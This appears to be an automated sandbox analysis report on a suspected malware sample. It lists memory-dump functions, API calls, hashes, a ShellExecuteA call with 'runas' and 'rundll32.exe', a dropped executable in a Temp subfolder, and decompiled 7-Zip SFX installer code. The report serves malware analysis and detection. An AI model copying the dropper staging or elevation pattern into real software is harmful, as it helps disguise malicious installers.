                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                          • String ID:
                                          • API String ID: 167067550-0
                                          • Opcode ID: 22ada1aa5a0999565f4649fd41049d2d4cddfa1566cacb94def0732eeda885c4
                                          • Instruction ID: cad325dfa9373cb83fa16a2491aa60d3d49cbbafe831e4a1914e4e3359733772
                                          • Opcode Fuzzy Hash: 22ada1aa5a0999565f4649fd41049d2d4cddfa1566cacb94def0732eeda885c4
                                          • Instruction Fuzzy Hash: F921C272A01309BF9B21AFA78C819EBB7ADEF003787104519F928D7144E735EDD0A7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1B498, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b249d12fc9b59e0ec041497314165488f495b78b51f7e95c6f71cf05210d6a2b
                                          • Instruction ID: 7d82eda4c1d2f9b2145a68edad359a1b82073b1c045a23cf7fe64ddde1787f9f
                                          • Opcode Fuzzy Hash: b249d12fc9b59e0ec041497314165488f495b78b51f7e95c6f71cf05210d6a2b
                                          • Instruction Fuzzy Hash: E521A172A08209FF9B20AF658C85DEB77ADEF003787144514FA29D7151EB35ED81BBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F16EF2, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,00F12605,?,?,?,?,00F13272,?), ref: 00F16EF7
                                          • _free.LIBCMT ref: 00F16F54
                                          • _free.LIBCMT ref: 00F16F8A
                                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F12605,?,?,?,?,00F13272,?), ref: 00F16F95
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: 7a0253932c7815c0f012a87fd0e35736ff94924f5d925a06b59987dd216ac756
                                          • Instruction ID: fbc3b81c249f586fd5d26969c878f220d529b5f66cb2bc7c76760e45cfaa9bb6
                                          • Opcode Fuzzy Hash: 7a0253932c7815c0f012a87fd0e35736ff94924f5d925a06b59987dd216ac756
                                          • Instruction Fuzzy Hash: 0A11C67260C205ABD71177757C85EEB3A5A8BC07757250229F62CC62E1FE258CDB7210
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F17049, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,00F1320C,00F16627,?,?,00F156FE), ref: 00F1704E
                                          • _free.LIBCMT ref: 00F170AB
                                          • _free.LIBCMT ref: 00F170E1
                                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F1320C,00F16627,?,?,00F156FE), ref: 00F170EC
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: 75ecd0e05c8c8f15c0a2a4247546566e2b48f2485ab2be3f1640049cdaf31be2
                                          • Instruction ID: 71d1a29843dac46cd3a38c7c99aa5dcca4fdac1b956931c90aeebee076cd5abe
                                          • Opcode Fuzzy Hash: 75ecd0e05c8c8f15c0a2a4247546566e2b48f2485ab2be3f1640049cdaf31be2
                                          • Instruction Fuzzy Hash: AD11E57260C705ABD7117674ACC2EEB367A9BC83757210225F62C822D1EF258CD67220
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F177A5, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,00F178A1,00000000,?,00F1E193,?,?,00F178A1,?,?,?,?,00000001), ref: 00F177BB
                                          • GetLastError.KERNEL32(?,00F1E193,?,?,00F178A1,?,?,?,?,00000001,00000000,00000000,?,00F178A1,?,?), ref: 00F177C5
                                          • __dosmaperr.LIBCMT ref: 00F177CC
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorFullLastNamePath__dosmaperr
                                          • String ID:
                                          • API String ID: 2398240785-0
                                          • Opcode ID: b5e26b93963eee0902eb0db62cb1cbccfbe6cd04405e8d9d45614a647aa83a47
                                          • Instruction ID: b1195fb6bba9c273b83a62ce72be919a63a845e7481c440826c64826e1aed9f2
                                          • Opcode Fuzzy Hash: b5e26b93963eee0902eb0db62cb1cbccfbe6cd04405e8d9d45614a647aa83a47
                                          • Instruction Fuzzy Hash: 2BF04B32608215BB8B217FB6DC08D9ABF79FF453B07208510F51D86560CB32E8A1EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1773C, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,00F178A1,00000000,?,00F1E208,?,?,?,?,?,?,00000001,00000000), ref: 00F17752
                                          • GetLastError.KERNEL32(?,00F1E208,?,?,?,?,?,?,00000001,00000000,00000000,?,00F178A1,?,?), ref: 00F1775C
                                          • __dosmaperr.LIBCMT ref: 00F17763
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorFullLastNamePath__dosmaperr
                                          • String ID:
                                          • API String ID: 2398240785-0
                                          • Opcode ID: b1f3c89f9d0ca5a2bf6742eacd4dc8865ecae45cbe5ef06cda437673dcc4694e
                                          • Instruction ID: 2db6ffe6c7fe5a4a58431b482a3637f7671725675646eed5fb581dd0ad849c30
                                          • Opcode Fuzzy Hash: b1f3c89f9d0ca5a2bf6742eacd4dc8865ecae45cbe5ef06cda437673dcc4694e
                                          • Instruction Fuzzy Hash: 95F0FB32609216BB8B207BB6DC0899ABF79FF453B07108511F52D96560D731E8A1EBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F21B95, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          • WriteConsoleW.KERNEL32(00F03D80,?,00F2E0A8,00000000,00F03D80,?,00F1EFD2,00F03D80,00000001,00F03D80,00F03D80,?,00F1882C,00000000,?,00F03D80), ref: 00F21BAC
                                          • GetLastError.KERNEL32(?,00F1EFD2,00F03D80,00000001,00F03D80,00F03D80,?,00F1882C,00000000,?,00F03D80,00000000,00F03D80,?,00F18D80,00F03D80), ref: 00F21BB8
                                            • Part of subcall function 00F21B7E: CloseHandle.KERNEL32(FFFFFFFE,00F21BC8,?,00F1EFD2,00F03D80,00000001,00F03D80,00F03D80,?,00F1882C,00000000,?,00F03D80,00000000,00F03D80), ref: 00F21B8E
                                          • ___initconout.LIBCMT ref: 00F21BC8
                                            • Part of subcall function 00F21B40: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F21B6F,00F1EFBF,00F03D80,?,00F1882C,00000000,?,00F03D80,00000000), ref: 00F21B53
                                          • WriteConsoleW.KERNEL32(00F03D80,?,00F2E0A8,00000000,?,00F1EFD2,00F03D80,00000001,00F03D80,00F03D80,?,00F1882C,00000000,?,00F03D80,00000000), ref: 00F21BDD
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: bcafcfe3536e5d19c30d5c9269947817e6fa0653b0f63901cce9ac55b2fb35ac
                                          • Instruction ID: b0f330bd3d13ba08fd77deda26e8b574b37ba8da889718a169e0bf06981a11df
                                          • Opcode Fuzzy Hash: bcafcfe3536e5d19c30d5c9269947817e6fa0653b0f63901cce9ac55b2fb35ac
                                          • Instruction Fuzzy Hash: 77F01C36505229BBCF226FE2EC14E8A3F26FF987B0F014050FA1885130DB328820FB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1583C, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00F15845
                                            • Part of subcall function 00F16601: HeapFree.KERNEL32(00000000,00000000,?,00F156FE), ref: 00F16617
                                            • Part of subcall function 00F16601: GetLastError.KERNEL32(?,?,00F156FE), ref: 00F16629
                                          • _free.LIBCMT ref: 00F15858
                                          • _free.LIBCMT ref: 00F15869
                                          • _free.LIBCMT ref: 00F1587A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 6cdacf593c9e825c689ffcca501c4d65407dfd4d558aee993ecfd33290bc44ea
                                          • Instruction ID: 8a93628a6cb096e39ea4c590f277982fbd1f95808c69640f0f1c2fa8ed6a9fa2
                                          • Opcode Fuzzy Hash: 6cdacf593c9e825c689ffcca501c4d65407dfd4d558aee993ecfd33290bc44ea
                                          • Instruction Fuzzy Hash: FDE0EC79824128DA8B026F65BC85489FFF3F74AB313014816F4509A231CB3B05A2BF8D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F02A20, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F02A8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: runas$rundll32.exe
                                          • API String ID: 587946157-4081450877
                                          • Opcode ID: eb0ad7be44a60552e57adf872328cd1813911998f7bee301e0548c99bf98e6ff
                                          • Instruction ID: 37e961ca84bacbebc5ce77b3aaed976bf9e4a7f418ef0efbc8eb70afd4b6200c
                                          • Opcode Fuzzy Hash: eb0ad7be44a60552e57adf872328cd1813911998f7bee301e0548c99bf98e6ff
                                          • Instruction Fuzzy Hash: 4A51B270600209ABEF14DF68CC85BDE7B65EF45304F908518F8155B2C2D779DA85EBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F14EEE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F1B55F: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00F1B584
                                            • Part of subcall function 00F1B55F: GetLastError.KERNEL32 ref: 00F1B58E
                                            • Part of subcall function 00F1B55F: __dosmaperr.LIBCMT ref: 00F1B595
                                          • _free.LIBCMT ref: 00F14FCA
                                          • _free.LIBCMT ref: 00F14FD4
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe, xrefs: 00F14EEE, 00F14F2B
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFileLastModuleName__dosmaperr
                                          • String ID: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                          • API String ID: 136706947-4023108300
                                          • Opcode ID: e685621083d884a569628316289cace421c4e49d6ae33db1d2edf216ad307ef7
                                          • Instruction ID: 32c844e18dd88b649419c8e1b998ca38c007bda823851c8a164c54b1df07b899
                                          • Opcode Fuzzy Hash: e685621083d884a569628316289cace421c4e49d6ae33db1d2edf216ad307ef7
                                          • Instruction Fuzzy Hash: F2312971E00219EFDB11DF99DC819EEBBF9FBC5320B2400AAE404E7311D771AA81AB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: 1sb1iwyem7.exe PID: 5384 Parent PID: 6908 1sb1iwyem7.exeCOMMON

                                          Executed Functions

                                          Function 00406024, Relevance: 193.6, APIs: 70, Strings: 40, Instructions: 1139windowCOMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00406024(void* __edx) {
				void* __edi;
				void* __esi;
				signed int _t218;
				short* _t237;
				void* _t238;
				signed int _t239;
				signed int _t240;
				signed int _t243;
				signed int _t248;
				signed int _t251;
				signed int _t255;
				signed int _t256;
				signed int _t262;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				signed int _t281;
				signed short _t283;
				intOrPtr _t287;
				signed short* _t289;
				signed int _t292;
				signed int _t293;
				void* _t294;
				short* _t299;
				long _t315;
				signed int _t322;
				signed short* _t328;
				signed int _t336;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t346;
				signed int _t348;
				signed int _t350;
				signed int _t358;
				signed int _t360;
				signed int _t367;
				signed int _t383;
				short _t400;
				signed short* _t401;
				signed int _t402;
				intOrPtr _t406;
				intOrPtr _t409;
				signed int _t412;
				intOrPtr _t416;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t425;
				signed int _t429;
				signed int _t430;
				signed short _t431;
				signed int _t434;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed short _t445;
				void* _t446;
				void* _t452;
				signed int _t455;
				signed int _t456;
				intOrPtr _t484;
				intOrPtr _t492;
				signed int _t509;
				signed int _t510;
				intOrPtr _t546;
				intOrPtr _t558;
				void* _t573;
				signed int _t592;
				signed int _t594;
				signed char _t596;
				signed int _t598;
				signed int _t603;
				WCHAR* _t605;
				void* _t610;
				intOrPtr _t612;
				signed int _t614;
				signed int _t616;
				void* _t641;
				signed int _t647;
				intOrPtr _t650;
				intOrPtr _t658;
				intOrPtr _t660;
				intOrPtr _t665;
				intOrPtr _t666;
				void* _t676;
				signed int _t679;
				void* _t682;
				signed int _t684;
				signed int _t685;
				intOrPtr _t689;
				signed short* _t690;
				signed int _t696;
				signed int _t697;
				void* _t698;
				signed int _t701;
				signed int _t703;
				signed int _t704;
				WCHAR* _t705;
				unsigned int _t712;
				signed int _t714;
				void* _t720;
				void* _t722;
				void* _t723;
				void* _t725;
				void* _t728;

				_t626 = __edx;
				_t720 = _t722 - 0x68;
				_t723 = _t722 - 0x2d4;
				__imp__?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z(E00405A8F, _t682, _t698, _t446);
				E00403834(__edx); // executed
				 *(_t720 - 0x26c) = 0x114;
				if(GetVersionExW(_t720 - 0x26c) == 0 ||  *((intOrPtr*)(_t720 - 0x25c)) != 2) {
					L215:
					MessageBoxA(0, "Sorry, this program requires Microsoft Windows 2000 or later.", "7-Zip SFX", 0x10);
					_t218 = 0x14;
					goto L216;
				} else {
					_t731 =  *((intOrPtr*)(_t720 - 0x268)) - 5;
					if( *((intOrPtr*)(_t720 - 0x268)) < 5) {
						goto L215;
					}
					";!@InstallEnd@!" = 0x3b;
					";!@Install@!UTF-8!" = 0x3b;
					E004147DF(E004147DF(E004147DF(_t216, _t720 + 0x24), _t720 - 0x48), _t720 - 8); // executed
					E0040541A(_t626); // executed
					E00414864(_t720 - 8, E00403022(GetCommandLineW(), _t720 + 0x24));
					E0040457E(_t720 - 8, _t682, _t731);
					_t684 =  *(_t720 - 8);
					E00404F69(L"SfxVarModulePlatform", L"x86", _t731, 1);
					E00404F69(L"SfxVarSystemPlatform", E00403EF5(_t731), _t731, 1);
					E00404F69(L"SfxVarCmdLine0", GetCommandLineW(), _t731, 1);
					wsprintfW(E0040420B(_t720 + 0x24, _t230, 0x20), L"%d",  *0x422730 & 0x0000ffff);
					_t725 = _t723 + 0xc;
					E004041F0(_t720 + 0x24);
					E00404F69(L"SfxVarSystemLanguage",  *((intOrPtr*)(_t720 + 0x24)), _t731, 1);
					_t237 = E004056BA(_t684, L"sfxlang");
					if(_t237 == 0 ||  *_t237 != 0x3a) {
						L8:
						_t238 = E004056BA(_t684, L"sfxversion");
						_t736 = _t238;
						if(_t238 == 0) {
							_t239 = E004056BA(_t684, L"sfxwaitall");
							__eflags = _t239;
							if(_t239 == 0) {
								_t635 = L"sfxelevation";
								 *((char*)(_t720 + 0x67)) = 0;
								_t240 = E004056BA(_t684, L"sfxelevation");
								__eflags = _t240;
								if(_t240 != 0) {
									 *((char*)(_t720 + 0x67)) = 1;
									_t684 = _t240;
								}
								_t243 = GetModuleFileNameW(0, E0040420B(0x422844, _t635, 0x208), 0x208);
								__eflags = _t243;
								if(_t243 != 0) {
									E004041F0(0x422844);
									_t636 = L"sfxtest";
									_t701 = E004056BA(_t684, L"sfxtest");
									__eflags = _t701;
									if(_t701 == 0) {
										L66:
										E004148C7(0x422794, 0x422844);
										E004148C7(0x4227ac, 0x422844);
										_t248 = E00403813(0x422844, __eflags);
										__eflags = _t248;
										if(__eflags >= 0) {
											_t605 =  *0x422794; // 0x9dee98
											 *0x422798 = _t248;
											 *((short*)(_t248 + _t248 + _t605)) = 0;
											_t406 =  *0x422844; // 0x2212c88
											_t38 = _t406 + 2; // 0x422846
											E00414864(0x4227ac, _t248 + _t248 + _t38);
											_t409 =  *0x422844; // 0x2212c88
											_t40 = _t409 + 2; // 0x422846
											E00414864(0x422890, _t248 + _t248 + _t40);
											_t412 = E00414A79(0x422890, 0x2e);
											__eflags = _t412;
											if(_t412 > 0) {
												_t636 =  *0x422890; // 0x22109c0
												__eflags = 0;
												 *0x422894 = _t412;
												 *((short*)(_t636 + _t412 * 2)) = 0;
											}
											E004148C7(0x42285c, 0x422890);
											_t610 = 4;
											E00414922(0x42285c, E00403CE0(_t610));
											_t416 =  *0x422890; // 0x22109c0
											_t612 =  *0x42285c; // 0x9def98
											 *0x422738 = _t416;
											 *0x422760 = _t612;
											 *0x422764 = _t416;
										}
										E00414864(0x422850, E00403EF5(__eflags));
										_t452 = 0x4227b8;
										_t251 = E004012CF(0x4227b8, __eflags,  *0x422844);
										__eflags = _t251;
										if(_t251 != 0) {
											E00405EEB(E004143C2(_t251, _t720 + 0x58), 0x4227a0);
											_t484 =  *0x4227bc; // 0x9d2650
											_t637 = 0; // executed
											_t255 = E00405319(_t484, 0, __eflags, _t720 + 0x58); // executed
											_t703 = _t255;
											__eflags = _t703;
											if(_t703 == 0) {
												__eflags =  *0x4228d8;
												if( *0x4228d8 != 0) {
													L84:
													__eflags =  *0x4228d8 - 4;
													if( *0x4228d8 == 4) {
														L119:
														_push( *((intOrPtr*)(_t720 + 0x58)));
														L0041C160();
														goto L10;
													}
													_t256 =  *0x422158; // 0x1
													_t704 = 0x422158;
													while(1) {
														__eflags = _t256;
														if(__eflags == 0) {
															break;
														}
														wsprintfW(_t720 - 0xa0, L"SfxString%d", _t256);
														_t725 = _t725 + 0xc;
														_t637 = E00403CE0( *_t704);
														E00404F69(_t720 - 0xa0, _t259, __eflags, 0); // executed
														_t704 = _t704 + 0x10;
														__eflags = _t704;
														_t256 =  *_t704;
													}
													_t488 = _t452;
													E004053FB(_t452, _t637, _t684);
													_t262 = E004016FE(__eflags);
													 *(_t720 + 0x10) = _t262;
													__eflags = _t262;
													if(_t262 != 0) {
														E00405729(_t488);
														_t705 = E00404F59();
														__eflags = _t705;
														if(__eflags == 0) {
															L101:
															E00405EEB(E00401303(_t452, __eflags), 0x4227a0);
															_t492 =  *0x4227bc; // 0x9d2650
															E00405319(_t492, 0, __eflags, 0); // executed
															E00405729(_t492);
															E00401368();
															E004016FE(__eflags);
															E00405729(_t452);
															__eflags =  *((char*)(_t720 + 0x67));
															if( *((char*)(_t720 + 0x67)) != 0) {
																L107:
																 *(_t720 + 0x3c) = 0;
																_t272 = E00404F59();
																while(1) {
																	_t685 = _t272;
																	__eflags = _t685;
																	if(_t685 == 0) {
																		break;
																	}
																	E00414803(_t720 + 0x40, _t685);
																	_t641 = 0x3d;
																	_t274 = E0041420C( *((intOrPtr*)(_t720 + 0x40)), _t641);
																	__eflags = _t274;
																	if(__eflags <= 0) {
																		_push( *((intOrPtr*)(_t720 + 0x40)));
																		L0041C160();
																		L113:
																		E00405D92(); // executed
																		__eflags =  *0x42245c - 0xffffffff;
																		if( *0x42245c == 0xffffffff) {
																			 *0x42245c = 0;
																		}
																		__eflags =  *0x4227cb; // 0x0
																		if(__eflags == 0) {
																			__eflags =  *0x4227c9; // 0x0
																			if(__eflags != 0) {
																				 *0x42245c =  *0x42245c & 0xfffffeff;
																				__eflags =  *0x42245c;
																			}
																			__imp__CoInitialize(0);
																			_t276 = E00404F59();
																			__eflags = _t276;
																			if(_t276 != 0) {
																				E00414864(0x42289c, _t276);
																				 *0x422740 = 1;
																			}
																			E00405517(0x42289c);
																			_t278 = E00404F59();
																			__eflags = _t278;
																			if(_t278 != 0) {
																				__imp___wtol(_t278);
																				 *0x422780 = _t278;
																			}
																			__eflags =  *0x4228e0; // 0x0
																			if(__eflags == 0) {
																				__eflags =  *0x4228d8 - 3;
																				if(__eflags != 0) {
																					_t709 = 0x41da3c;
																					E00404F69(L"SfxVarApiPath", 0x41da3c, __eflags, 0);
																					E00405D92();
																					_t281 = E00404F59();
																					__eflags = _t281;
																					if(_t281 != 0) {
																						__eflags =  *0x4227ca;
																						if( *0x4227ca == 0) {
																							E00407370(0x422868, 0);
																							_t665 =  *0x42286c; // 0x9ded58
																							E00404F69(L"SfxVarApiPath", _t665, __eflags, 0);
																							E00405D92();
																							E00414803(_t720 + 0x30, 0x41da3c);
																							E00407370(0x422868, _t665);
																							_t666 =  *0x42286c; // 0x9ded58
																							E004022F7(L"ExecuteOnLoad", _t666, 0x41da3c, _t720 + 0x30, 0x41da3c);
																							_push( *((intOrPtr*)(_t720 + 0x30)));
																							L0041C160();
																						}
																					}
																					E0040830C(0x4227f0);
																					while(1) {
																						_t283 = E00404F59();
																						__eflags = _t283;
																						if(_t283 == 0) {
																							goto L142;
																						}
																						__eflags =  *0x4227c9;
																						if( *0x4227c9 != 0) {
																							goto L142;
																						}
																						_t558 =  *0x422738; // 0x22109c0
																						_t350 = E00408B40(_t558, _t283);
																						__eflags = _t350;
																						if(_t350 == 0) {
																							_push( *((intOrPtr*)(_t720 + 0x58)));
																							L0041C160();
																							L165:
																							_push(5);
																							goto L22;
																						}
																						_t283 = GetKeyState(0x10);
																						__eflags = 0x00008000 & _t283;
																						if((0x00008000 & _t283) != 0) {
																							 *0x4227c8 = 0x101;
																						}
																						__eflags =  *0x4228c0;
																						if( *0x4228c0 != 0) {
																							 *0x42245c =  *0x42245c & 0xffffff7f;
																							__eflags =  *0x42245c;
																						}
																						L142:
																						E004147DF(_t283, _t720 + 0x4c);
																						__eflags =  *0x4227c8;
																						if( *0x4227c8 == 0) {
																							L152:
																							__eflags =  *(_t720 + 0x50);
																							 *((char*)(_t720 + 0x14)) = 0;
																							if( *(_t720 + 0x50) == 0) {
																								_t339 = E00404F59();
																								__eflags = _t339;
																								if(_t339 != 0) {
																									E00414864(_t720 + 0x4c, L"ExecuteFile");
																									 *((char*)(_t720 + 0x14)) = 1;
																								}
																								__eflags =  *(_t720 + 0x50);
																								if( *(_t720 + 0x50) == 0) {
																									_t340 = E00404F59();
																									__eflags = _t340;
																									if(_t340 != 0) {
																										E00414864(_t720 + 0x4c, L"RunProgram");
																									}
																								}
																							}
																							__eflags =  *0x4227c8;
																							if( *0x4227c8 != 0) {
																								L168:
																								__eflags =  *0x4228a0;
																								if(__eflags != 0) {
																									E00414839(_t720 + 0x18, 0x42289c);
																									E00405517(_t720 + 0x18);
																									__eflags =  *(_t720 + 0x1c);
																									if( *(_t720 + 0x1c) != 0) {
																										E004148C7(0x42289c, _t720 + 0x18);
																									}
																									_push( *((intOrPtr*)(_t720 + 0x18)));
																									 *0x422740 = 1;
																									L0041C160();
																								} else {
																									E004148C7(0x42289c, E004042B5(L"7ZipSfx.%03x", __eflags));
																									_push( *((intOrPtr*)(_t720 - 0x14)));
																									L0041C160();
																									 *0x422740 = 0;
																								}
																								_t287 =  *0x42289c; // 0x2214528
																								_t509 =  *0x4228a0; // 0x2c
																								_t162 = _t509 * 2; // 0x430e01
																								_t647 =  *(_t287 + _t162 - 2) & 0x0000ffff;
																								__eflags = _t647 - 0x5c;
																								if(_t647 == 0x5c) {
																									L175:
																									_t510 = _t509 - 1;
																									__eflags = 0;
																									 *0x4228a0 = _t510;
																									 *((short*)(_t287 + _t510 * 2)) = 0;
																									goto L176;
																								} else {
																									__eflags = _t647 - 0x2f;
																									if(_t647 != 0x2f) {
																										L176:
																										__eflags =  *0x4227c9;
																										if( *0x4227c9 != 0) {
																											 *0x422774 =  *0x422774 | 0x00000003;
																											__eflags =  *0x422774;
																										}
																										E00414803(_t720 - 0x20, L"PreExtract");
																										_t289 =  *0x4227c4; // 0x41d648
																										E00401585(_t720 - 0x20,  *_t289 & 0x0000ffff);
																										_t649 = 0;
																										_t292 = E00404F59();
																										__eflags = _t292;
																										if(_t292 != 0) {
																											__eflags =  *0x4227ca;
																											if( *0x4227ca == 0) {
																												E00407370(0x422868, 0);
																												_t658 =  *0x42286c; // 0x9ded58
																												E00404F69(L"SfxVarApiPath", _t658, __eflags, 0);
																												E00405D92();
																												E00414803(_t720 + 0x30, _t709);
																												_t328 =  *0x4227c4; // 0x41d648
																												 *(_t720 - 0x24) = _t328;
																												E00407370(0x422868, _t658);
																												_t649 =  *0x42286c; // 0x9ded58
																												E004022F7(L"PreExtract", _t649,  *(_t720 - 0x24), _t720 + 0x30, _t709); // executed
																												_push( *((intOrPtr*)(_t720 + 0x30)));
																												L0041C160();
																											}
																										}
																										__eflags =  *0x4228d4;
																										if(__eflags != 0) {
																											_t293 = E00408C2E(_t649);
																											__eflags = _t293;
																											if(_t293 != 0) {
																												goto L187;
																											}
																											_t322 = 0x80004005;
																											goto L185;
																										} else {
																											_t322 = E00402CB1(0x42289c, _t649, __eflags); // executed
																											L185:
